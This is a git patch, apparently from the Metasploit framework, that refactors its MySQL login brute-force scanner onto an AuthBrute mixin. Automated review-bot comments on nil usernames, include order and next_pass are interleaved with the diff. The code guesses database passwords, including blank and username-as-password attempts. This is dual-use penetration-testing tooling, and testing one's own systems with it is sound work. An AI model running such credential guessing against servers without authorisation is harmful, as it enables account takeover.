From 08eb80f4a9b2474314f2e1ff010cab48e7926c8a Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 18 Jan 2010 22:22:22 +0000 Subject: [PATCH] use the authbrute mixin git-svn-id: file:///home/svn/framework3/trunk@8150 4d416f70-5f16-0410-b530-b9f4589650da --- lib/msf/core/exploit/mysql.rb | 6 +- .../auxiliary/scanner/mysql/mysql_login.rb | 70 ++++++------------- 2 files changed, 23 insertions(+), 53 deletions(-) diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index 1e0e29de3d..57e04f969e 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -29,8 +29,8 @@ module Exploit::Remote::MYSQL [ Opt::RHOST, Opt::RPORT(3306), - OptString.new('MYSQL_USER', [ true, 'The username to authenticate as', 'root']), - OptString.new('MYSQL_PASS', [ false, 'The password for the specified username', '']), + OptString.new('USERNAME', [ false, 'The username to authenticate as' ]), + OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), ], Msf::Exploit::Remote::MYSQL ) end @@ -55,7 +55,7 @@ module Exploit::Remote::MYSQL end def mysql_login_datastore - mysql_login(datastore['MYSQL_USER'], datastore['MYSQL_PASS']) + mysql_login(datastore['USERNAME'], datastore['PASSWORD']) end def mysql_query(sql) diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index 59bc83206c..3a6e8790ac 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -16,9 +16,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL - include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 
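Review bot: In the register_options hunk of lib/msf/core/exploit/mysql.rb, `USERNAME` is now optional with no default, whereas the old `MYSQL_USER` was required and defaulted to `'root'`; the second hunk of the same file (`mysql_login_datastore`) therefore passes `nil` to `mysql_login` whenever a module using this mixin leaves USERNAME unset, and whether `mysql_login` copes with nil is not visible here. The rename also means any other module or resource script still setting `MYSQL_USER`/`MYSQL_PASS` silently loses its credentials (not checkable from this diff). If the login scanner is the only reason for dropping the default, consider keeping it for the mixin's other users, `OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ]),`, or add a comment on `mysql_login_datastore` stating that a nil username is expected and handled downstream.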
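Review bot: The ordering of the include lines in modules/auxiliary/scanner/mysql/mysql_login.rb is load-bearing: Ruby searches the most recently included module first, so moving `Msf::Auxiliary::Scanner` below the new `Msf::Auxiliary::AuthBrute` decides which module wins if both define a method of the same name. I cannot see either mixin here, so I can only hedge that the reorder is deliberate; a one-line comment such as `# Scanner must stay after AuthBrute so its definitions take precedence` would stop a later tidy-up from swapping them back.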
@@ -31,56 +32,15 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('MYSQL_PASS_FILE', [ false, 'A dictionary of passwords to perform a bruteforce attempt']), OptBool.new('VERBOSE', [ true, 'Verbose output', false]) ], self.class) end def run_host(ip) - - user = datastore['MYSQL_USER'].to_s - user = "root" if user.empty? - - if (datastore['MYSQL_PASS_FILE'] and not datastore['MYSQL_PASS_FILE'].empty?) - stime = Time.now.to_f - cnt = 0 - - File.open(datastore['MYSQL_PASS_FILE'], "rb") do |fd| - lcnt = 0 - fd.each_line{lcnt += 1 } - fd.seek(0) - - # Always try a blank password (not handled in the file parsing) - ret = do_login(user, '', datastore['VERBOSE']) - return if ret == :pass - return if ret == :error - - fd.each_line do |line| - line.strip! - next if line =~ /^#/ - next if line.empty? - - ret = do_login(user, line.strip, datastore['VERBOSE']) - break if ret == :pass - break if ret == :error - - cnt += 1 - if(cnt % 1000 == 0) - pps = (cnt / (Time.now.to_f - stime)).to_i - pct = (cnt/lcnt.to_f * 100.0).to_i - eta = ((lcnt - cnt) / pps / 60.0).to_i - print_status( - "#{rhost}:#{rport} completed #{cnt}/#{lcnt} passwords (#{pct}%) " + - "at a rate of #{pps} per second " + - "ETA #{eta} minutes" - ) - end - end - end - else - do_login(user, datastore['MYSQL_PASS'], datastore['VERBOSE']) - end + each_user_pass { |user, pass| + do_login(user, pass, datastore['VERBOSE']) + } end 
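Review bot: The `user = "root" if user.empty?` fallback is removed from `run_host` at the same time the mixin's `USERNAME` option loses its default, so nothing on this page supplies a username when the option is unset; unless `each_user_pass` (from AuthBrute, not shown) substitutes one, the block ends up calling `do_login(nil, pass, ...)`. The block's value is whatever `do_login` returns (`:next_user`, `:fail`, `:error`, `:done`), and where the old loop explicitly stopped on `:error`, the new code relies on the iterator interpreting those symbols, which this hunk does not show. A short comment above the block naming which of these symbols the iterator acts on, e.g. `# do_login's return value steers each_user_pass; see AuthBrute`, would make that dependency explicit. The `MYSQL_PASS_FILE` option and the rate/ETA progress output also disappear without a note for users of the old option.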
@@ -92,24 +52,34 @@ class Metasploit3 < Msf::Auxiliary print_status("#{rhost}:#{rport} successful logged in as '#{user}' with password '#{pass}'") report_auth_info( :host => rhost, - :proto => 'MYSQL', + :proto => 'mysql', :user => user, :pass => pass, :targ_host => rhost, :targ_port => rport ) - return :pass + return :next_user rescue ::RbMysql::AccessDeniedError - print_status("#{rhost}:#{rport} failed to login as '#{user}' with password '#{pass}'") if verbose - return :fail + print_status("#{rhost}:#{rport} failed to login as '#{user}' with password '#{pass}'") if verbose + return :fail rescue ::RbMysql::Error => e print_error("#{rhost}:#{rport} failed to login: #{e}") return :error rescue ::Interrupt raise $! rescue ::Rex::ConnectionError - return :error + return :done end end + + def next_pass(state) + # Always try empty and the username + passes = ['', state[:user]] + state[:idx] ||= 0 + pass = passes[state[:idx]] + state[:idx] += 1 + return pass + end + end
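Review bot: `next_pass` returns `nil` on every call after the second, because `state[:idx]` grows without bound and `passes[2]` is nil; that is only correct if the caller treats nil as "list exhausted", and when `USERNAME` is unset `state[:user]` is nil as well, so the list ends after the blank password alone. Defining `next_pass` on the module also shadows any method of that name the AuthBrute mixin provides, so a file-driven password list may never be consulted — this is an inference, the mixin is not on the page. The comment `# Always try empty and the username` should say the rest of the contract: `# Always try empty and the username; returns nil once both have been handed out`. `do_login` now answers with four different symbols (`:next_user`, `:fail`, `:error`, `:done`) and would benefit from a header comment listing what each means to the iterator; its `begin`/`mysql_login` call lies above this hunk. In the `rescue ::Interrupt` arm, `raise $!` can simply be `raise`.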